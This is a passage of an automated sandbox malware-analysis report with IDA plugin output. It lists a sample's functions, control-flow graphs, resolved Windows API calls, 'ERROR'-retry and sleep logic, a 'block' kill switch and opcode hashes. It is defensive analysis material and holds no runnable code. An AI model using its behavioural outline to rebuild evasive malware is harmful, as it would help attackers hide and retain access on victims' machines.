                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 4eecebb087233200e31579179714cb13f1c3920f663faa0c2c502026596af59d
                              • Instruction ID: 26d69cd1214d36c00752de0c2cbf42e8de602293b5fa3c28d2f7661252c12017
                              • Opcode Fuzzy Hash: 4eecebb087233200e31579179714cb13f1c3920f663faa0c2c502026596af59d
                              • Instruction Fuzzy Hash: DBF044B1E44208ABC700DFD5DD49BAEBBB8F704711F10015AFA15E3680C77419058BE1
                              Function 00851160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: c41f1c6609c263c1767f19f65740987c9acdeb65719ccac22f5c9c16337fd114
                              • Instruction ID: cc8d31470adffda27479ca5c8dadf3a462b128690dd23d7bda0be587c9cfbcc3
                              • Opcode Fuzzy Hash: c41f1c6609c263c1767f19f65740987c9acdeb65719ccac22f5c9c16337fd114
                              • Instruction Fuzzy Hash: 46D05E74A0030CDBCB00DFE0D84A6DDBB78FB08312F001596DD05A2340EA305886CBA6
                              Function 00869C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 869c10-869c1a 634 86a036-86a0ca LoadLibraryA * 8 633->634 635 869c20-86a031 GetProcAddress * 43 633->635 636 86a146-86a14d 634->636 637 86a0cc-86a141 GetProcAddress * 5 634->637 635->634 638 86a216-86a21d 636->638 639 86a153-86a211 GetProcAddress * 8 636->639 637->636 640 86a21f-86a293 GetProcAddress * 5 638->640 641 86a298-86a29f 638->641 639->638 640->641 642 86a337-86a33e 641->642 643 86a2a5-86a332 GetProcAddress * 6 641->643 644 86a344-86a41a GetProcAddress * 9 642->644 645 86a41f-86a426 642->645 643->642 644->645 646 86a4a2-86a4a9 645->646 647 86a428-86a49d GetProcAddress * 5 645->647 648 86a4dc-86a4e3 646->648 649 86a4ab-86a4d7 GetProcAddress * 2 646->649 647->646 650 86a515-86a51c 648->650 651 86a4e5-86a510 GetProcAddress * 2 648->651 649->648 652 86a612-86a619 650->652 653 86a522-86a60d GetProcAddress * 10 650->653 651->650 654 86a67d-86a684 652->654 655 86a61b-86a678 GetProcAddress * 4 652->655 653->652 656 86a686-86a699 GetProcAddress 654->656 657 86a69e-86a6a5 654->657 655->654 656->657 658 86a6a7-86a703 GetProcAddress * 4 657->658 659 86a708-86a709 657->659 658->659
                              APIs
                              • GetProcAddress.KERNEL32(75550000,015B6940), ref: 00869C2D
                              • GetProcAddress.KERNEL32(75550000,015B66A0), ref: 00869C45
                              • GetProcAddress.KERNEL32(75550000,015C8F10), ref: 00869C5E
                              • GetProcAddress.KERNEL32(75550000,015C8F40), ref: 00869C76
                              • GetProcAddress.KERNEL32(75550000,015CCF00), ref: 00869C8E
                              • GetProcAddress.KERNEL32(75550000,015CCF18), ref: 00869CA7
                              • GetProcAddress.KERNEL32(75550000,015BB568), ref: 00869CBF
                              • GetProcAddress.KERNEL32(75550000,015CCF78), ref: 00869CD7
                              • GetProcAddress.KERNEL32(75550000,015CCFA8), ref: 00869CF0
                              • GetProcAddress.KERNEL32(75550000,015CCF60), ref: 00869D08
                              • GetProcAddress.KERNEL32(75550000,015CCF90), ref: 00869D20
                              • GetProcAddress.KERNEL32(75550000,015B66C0), ref: 00869D39
                              • GetProcAddress.KERNEL32(75550000,015B6800), ref: 00869D51
                              • GetProcAddress.KERNEL32(75550000,015B66E0), ref: 00869D69
                              • GetProcAddress.KERNEL32(75550000,015B6700), ref: 00869D82
                              • GetProcAddress.KERNEL32(75550000,015CCEE8), ref: 00869D9A
                              • GetProcAddress.KERNEL32(75550000,015CCF48), ref: 00869DB2
                              • GetProcAddress.KERNEL32(75550000,015BB590), ref: 00869DCB
                              • GetProcAddress.KERNEL32(75550000,015B6840), ref: 00869DE3
                              • GetProcAddress.KERNEL32(75550000,015CCE58), ref: 00869DFB
                              • GetProcAddress.KERNEL32(75550000,015CCF30), ref: 00869E14
                              • GetProcAddress.KERNEL32(75550000,015CCFC0), ref: 00869E2C
                              • GetProcAddress.KERNEL32(75550000,015CCE10), ref: 00869E44
                              • GetProcAddress.KERNEL32(75550000,015B6880), ref: 00869E5D
                              • GetProcAddress.KERNEL32(75550000,015CCEB8), ref: 00869E75
                              • GetProcAddress.KERNEL32(75550000,015CCED0), ref: 00869E8D
                              • GetProcAddress.KERNEL32(75550000,015CCE28), ref: 00869EA6
                              • GetProcAddress.KERNEL32(75550000,015CCE40), ref: 00869EBE
                              • GetProcAddress.KERNEL32(75550000,015CCE70), ref: 00869ED6
                              • GetProcAddress.KERNEL32(75550000,015CCE88), ref: 00869EEF
                              • GetProcAddress.KERNEL32(75550000,015CCEA0), ref: 00869F07
                              • GetProcAddress.KERNEL32(75550000,015CC8E8), ref: 00869F1F
                              • GetProcAddress.KERNEL32(75550000,015CC9F0), ref: 00869F38
                              • GetProcAddress.KERNEL32(75550000,015C9F98), ref: 00869F50
                              • GetProcAddress.KERNEL32(75550000,015CCAB0), ref: 00869F68
                              • GetProcAddress.KERNEL32(75550000,015CCA38), ref: 00869F81
                              • GetProcAddress.KERNEL32(75550000,015B68A0), ref: 00869F99
                              • GetProcAddress.KERNEL32(75550000,015CC9D8), ref: 00869FB1
                              • GetProcAddress.KERNEL32(75550000,015B68C0), ref: 00869FCA
                              • GetProcAddress.KERNEL32(75550000,015CC8D0), ref: 00869FE2
                              • GetProcAddress.KERNEL32(75550000,015CCA08), ref: 00869FFA
                              • GetProcAddress.KERNEL32(75550000,015B6480), ref: 0086A013
                              • GetProcAddress.KERNEL32(75550000,015B6400), ref: 0086A02B
                              • LoadLibraryA.KERNEL32(015CC900,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A03D
                              • LoadLibraryA.KERNEL32(015CC828,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A04E
                              • LoadLibraryA.KERNEL32(015CC918,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A060
                              • LoadLibraryA.KERNEL32(015CCA68,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A072
                              • LoadLibraryA.KERNEL32(015CCA50,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A083
                              • LoadLibraryA.KERNEL32(015CC978,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A095
                              • LoadLibraryA.KERNEL32(015CCAE0,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A0A7
                              • LoadLibraryA.KERNEL32(015CC990,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A0B8
                              • GetProcAddress.KERNEL32(75750000,015B65C0), ref: 0086A0DA
                              • GetProcAddress.KERNEL32(75750000,015CCA80), ref: 0086A0F2
                              • GetProcAddress.KERNEL32(75750000,015C88A0), ref: 0086A10A
                              • GetProcAddress.KERNEL32(75750000,015CC930), ref: 0086A123
                              • GetProcAddress.KERNEL32(75750000,015B64A0), ref: 0086A13B
                              • GetProcAddress.KERNEL32(73B30000,015BB310), ref: 0086A160
                              • GetProcAddress.KERNEL32(73B30000,015B65E0), ref: 0086A179
                              • GetProcAddress.KERNEL32(73B30000,015BAFC8), ref: 0086A191
                              • GetProcAddress.KERNEL32(73B30000,015CCA98), ref: 0086A1A9
                              • GetProcAddress.KERNEL32(73B30000,015CC948), ref: 0086A1C2
                              • GetProcAddress.KERNEL32(73B30000,015B6560), ref: 0086A1DA
                              • GetProcAddress.KERNEL32(73B30000,015B62C0), ref: 0086A1F2
                              • GetProcAddress.KERNEL32(73B30000,015CC8A0), ref: 0086A20B
                              • GetProcAddress.KERNEL32(757E0000,015B6320), ref: 0086A22C
                              • GetProcAddress.KERNEL32(757E0000,015B6420), ref: 0086A244
                              • GetProcAddress.KERNEL32(757E0000,015CC858), ref: 0086A25D
                              • GetProcAddress.KERNEL32(757E0000,015CC960), ref: 0086A275
                              • GetProcAddress.KERNEL32(757E0000,015B64C0), ref: 0086A28D
                              • GetProcAddress.KERNEL32(758D0000,015BAF50), ref: 0086A2B3
                              • GetProcAddress.KERNEL32(758D0000,015BB180), ref: 0086A2CB
                              • GetProcAddress.KERNEL32(758D0000,015CC9A8), ref: 0086A2E3
                              • GetProcAddress.KERNEL32(758D0000,015B6300), ref: 0086A2FC
                              • GetProcAddress.KERNEL32(758D0000,015B6440), ref: 0086A314
                              • GetProcAddress.KERNEL32(758D0000,015BB018), ref: 0086A32C
                              • GetProcAddress.KERNEL32(76BE0000,015CCAC8), ref: 0086A352
                              • GetProcAddress.KERNEL32(76BE0000,015B6600), ref: 0086A36A
                              • GetProcAddress.KERNEL32(76BE0000,015C8820), ref: 0086A382
                              • GetProcAddress.KERNEL32(76BE0000,015CCAF8), ref: 0086A39B
                              • GetProcAddress.KERNEL32(76BE0000,015CC8B8), ref: 0086A3B3
                              • GetProcAddress.KERNEL32(76BE0000,015B6620), ref: 0086A3CB
                              • GetProcAddress.KERNEL32(76BE0000,015B6660), ref: 0086A3E4
                              • GetProcAddress.KERNEL32(76BE0000,015CC810), ref: 0086A3FC
                              • GetProcAddress.KERNEL32(76BE0000,015CCA20), ref: 0086A414
                              • GetProcAddress.KERNEL32(75670000,015B6640), ref: 0086A436
                              • GetProcAddress.KERNEL32(75670000,015CC840), ref: 0086A44E
                              • GetProcAddress.KERNEL32(75670000,015CC9C0), ref: 0086A466
                              • GetProcAddress.KERNEL32(75670000,015CC870), ref: 0086A47F
                              • GetProcAddress.KERNEL32(75670000,015CC888), ref: 0086A497
                              • GetProcAddress.KERNEL32(759D0000,015B65A0), ref: 0086A4B8
                              • GetProcAddress.KERNEL32(759D0000,015B6580), ref: 0086A4D1
                              • GetProcAddress.KERNEL32(76D80000,015B6280), ref: 0086A4F2
                              • GetProcAddress.KERNEL32(76D80000,015CCD20), ref: 0086A50A
                              • GetProcAddress.KERNEL32(6F5C0000,015B62A0), ref: 0086A530
                              • GetProcAddress.KERNEL32(6F5C0000,015B63C0), ref: 0086A548
                              • GetProcAddress.KERNEL32(6F5C0000,015B62E0), ref: 0086A560
                              • GetProcAddress.KERNEL32(6F5C0000,015CCC60), ref: 0086A579
                              • GetProcAddress.KERNEL32(6F5C0000,015B6340), ref: 0086A591
                              • GetProcAddress.KERNEL32(6F5C0000,015B6520), ref: 0086A5A9
                              • GetProcAddress.KERNEL32(6F5C0000,015B6460), ref: 0086A5C2
                              • GetProcAddress.KERNEL32(6F5C0000,015B6360), ref: 0086A5DA
                              • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 0086A5F1
                              • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 0086A607
                              • GetProcAddress.KERNEL32(75480000,015CCC30), ref: 0086A629
                              • GetProcAddress.KERNEL32(75480000,015C8840), ref: 0086A641
                              • GetProcAddress.KERNEL32(75480000,015CCBD0), ref: 0086A659
                              • GetProcAddress.KERNEL32(75480000,015CCCA8), ref: 0086A672
                              • GetProcAddress.KERNEL32(753B0000,015B6500), ref: 0086A693
                              • GetProcAddress.KERNEL32(6EAD0000,015CCBE8), ref: 0086A6B4
                              • GetProcAddress.KERNEL32(6EAD0000,015B6380), ref: 0086A6CD
                              • GetProcAddress.KERNEL32(6EAD0000,015CCDB0), ref: 0086A6E5
                              • GetProcAddress.KERNEL32(6EAD0000,015CCB70), ref: 0086A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 57939c42aa48986ea2dc1244f365ad6fee277cd864e90a18a66b5d2895976dc5
                              • Instruction ID: c43ca45e41ab2fe5d7cc18c283c89dea807f4a3528c919572155109acbda3e22
                              • Opcode Fuzzy Hash: 57939c42aa48986ea2dc1244f365ad6fee277cd864e90a18a66b5d2895976dc5
                              • Instruction Fuzzy Hash: 2762E8B6710200AFC744DFE9ED8996637F9F7AC701724851BA609C3274DE399843DB92
                              Function 00865510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 858 865510-865577 call 865ad0 call 86a820 * 3 call 86a740 * 4 874 86557c-865583 858->874 875 8655d7-86564c call 86a740 * 2 call 851590 call 8652c0 call 86a8a0 call 86a800 call 86aad0 StrCmpCA 874->875 876 865585-8655b6 call 86a820 call 86a7a0 call 851590 call 8651f0 874->876 902 865693-8656a9 call 86aad0 StrCmpCA 875->902 906 86564e-86568e call 86a7a0 call 851590 call 8651f0 call 86a8a0 call 86a800 875->906 891 8655bb-8655d2 call 86a8a0 call 86a800 876->891 891->902 907 8656af-8656b6 902->907 908 8657dc-865844 call 86a8a0 call 86a820 * 2 call 851670 call 86a800 * 4 call 866560 call 851550 902->908 906->902 910 8656bc-8656c3 907->910 911 8657da-86585f call 86aad0 StrCmpCA 907->911 1039 865ac3-865ac6 908->1039 914 8656c5-865719 call 86a820 call 86a7a0 call 851590 call 8651f0 call 86a8a0 call 86a800 910->914 915 86571e-865793 call 86a740 * 2 call 851590 call 8652c0 call 86a8a0 call 86a800 call 86aad0 StrCmpCA 910->915 929 865865-86586c 911->929 930 865991-8659f9 call 86a8a0 call 86a820 * 2 call 851670 call 86a800 * 4 call 866560 call 851550 911->930 914->911 915->911 1018 865795-8657d5 call 86a7a0 call 851590 call 8651f0 call 86a8a0 call 86a800 915->1018 936 865872-865879 929->936 937 86598f-865a14 call 86aad0 StrCmpCA 929->937 930->1039 943 8658d3-865948 call 86a740 * 2 call 851590 call 8652c0 call 86a8a0 call 86a800 call 86aad0 StrCmpCA 936->943 944 86587b-8658ce call 86a820 call 86a7a0 call 851590 call 8651f0 call 86a8a0 call 86a800 936->944 966 865a16-865a21 Sleep 937->966 967 865a28-865a91 call 86a8a0 call 86a820 * 2 call 851670 call 86a800 * 4 call 866560 call 851550 937->967 943->937 1042 86594a-86598a call 86a7a0 call 851590 call 8651f0 call 86a8a0 call 86a800 943->1042 944->937 966->874 967->1039 1018->911 1042->937
                              APIs
                                • Part of subcall function 0086A820: lstrlen.KERNEL32(00854F05,?,?,00854F05,00870DDE), ref: 0086A82B
                                • Part of subcall function 0086A820: lstrcpy.KERNEL32(00870DDE,00000000), ref: 0086A885
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00865644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008656A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00865857
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008651F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00865228
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 008652C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00865318
                                • Part of subcall function 008652C0: lstrlen.KERNEL32(00000000), ref: 0086532F
                                • Part of subcall function 008652C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00865364
                                • Part of subcall function 008652C0: lstrlen.KERNEL32(00000000), ref: 00865383
                                • Part of subcall function 008652C0: lstrlen.KERNEL32(00000000), ref: 008653AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0086578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00865940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00865A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00865A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 242ef77ed280447d1755897380b4194a76b2a5cb8e69118e2d4460b76c14dc71
                              • Instruction ID: 40340a28082e6c681bacc9178142e687526ccc414484d337fb0dded4763cee34
                              • Opcode Fuzzy Hash: 242ef77ed280447d1755897380b4194a76b2a5cb8e69118e2d4460b76c14dc71
                              • Instruction Fuzzy Hash: 70E11171A101089ACB18FBA8DC97AED7378FF64301F518529B506E7195EF346A0ACF93
                              Function 008617A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1069 8617a0-8617cd call 86aad0 StrCmpCA 1072 8617d7-8617f1 call 86aad0 1069->1072 1073 8617cf-8617d1 ExitProcess 1069->1073 1077 8617f4-8617f8 1072->1077 1078 8619c2-8619cd call 86a800 1077->1078 1079 8617fe-861811 1077->1079 1081 861817-86181a 1079->1081 1082 86199e-8619bd 1079->1082 1084 861821-861830 call 86a820 1081->1084 1085 8618cf-8618e0 StrCmpCA 1081->1085 1086 86198f-861999 call 86a820 1081->1086 1087 8618ad-8618be StrCmpCA 1081->1087 1088 861849-861858 call 86a820 1081->1088 1089 861835-861844 call 86a820 1081->1089 1090 861932-861943 StrCmpCA 1081->1090 1091 861913-861924 StrCmpCA 1081->1091 1092 861970-861981 StrCmpCA 1081->1092 1093 8618f1-861902 StrCmpCA 1081->1093 1094 861951-861962 StrCmpCA 1081->1094 1095 86187f-861890 StrCmpCA 1081->1095 1096 86185d-86186e StrCmpCA 1081->1096 1082->1077 1084->1082 1110 8618e2-8618e5 1085->1110 1111 8618ec 1085->1111 1086->1082 1108 8618c0-8618c3 1087->1108 1109 8618ca 1087->1109 1088->1082 1089->1082 1116 861945-861948 1090->1116 1117 86194f 1090->1117 1114 861926-861929 1091->1114 1115 861930 1091->1115 1098 861983-861986 1092->1098 1099 86198d 1092->1099 1112 861904-861907 1093->1112 1113 86190e 1093->1113 1118 861964-861967 1094->1118 1119 86196e 1094->1119 1106 861892-86189c 1095->1106 1107 86189e-8618a1 1095->1107 1104 861870-861873 1096->1104 1105 86187a 1096->1105 1098->1099 1099->1082 1104->1105 1105->1082 1123 8618a8 1106->1123 1107->1123 1108->1109 1109->1082 1110->1111 1111->1082 1112->1113 1113->1082 1114->1115 1115->1082 1116->1117 1117->1082 1118->1119 1119->1082 1123->1082
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 008617C5
                              • ExitProcess.KERNEL32 ref: 008617D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 353c7eb3ea2a78d745381d0717c6c801eee9f3b60fcc38d93635b9157104719f
                              • Instruction ID: 96aa4ec0eec23c9395f347689d094bd3452b7d6fd359e84d2c39cc98b11df303
                              • Opcode Fuzzy Hash: 353c7eb3ea2a78d745381d0717c6c801eee9f3b60fcc38d93635b9157104719f
                              • Instruction Fuzzy Hash: 39517AB4A00209EFCF04DFA1C958ABE7BB5FF44304F19845AE406E7241DB74E942CBA2
                              Function 00867500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1124 867500-86754a GetWindowsDirectoryA 1125 867553-8675c7 GetVolumeInformationA call 868d00 * 3 1124->1125 1126 86754c 1124->1126 1133 8675d8-8675df 1125->1133 1126->1125 1134 8675e1-8675fa call 868d00 1133->1134 1135 8675fc-867617 GetProcessHeap RtlAllocateHeap 1133->1135 1134->1133 1137 867628-867658 wsprintfA call 86a740 1135->1137 1138 867619-867626 call 86a740 1135->1138 1145 86767e-86768e 1137->1145 1138->1145
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00867542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0086757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00867603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0086760A
                              • wsprintfA.USER32 ref: 00867640
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
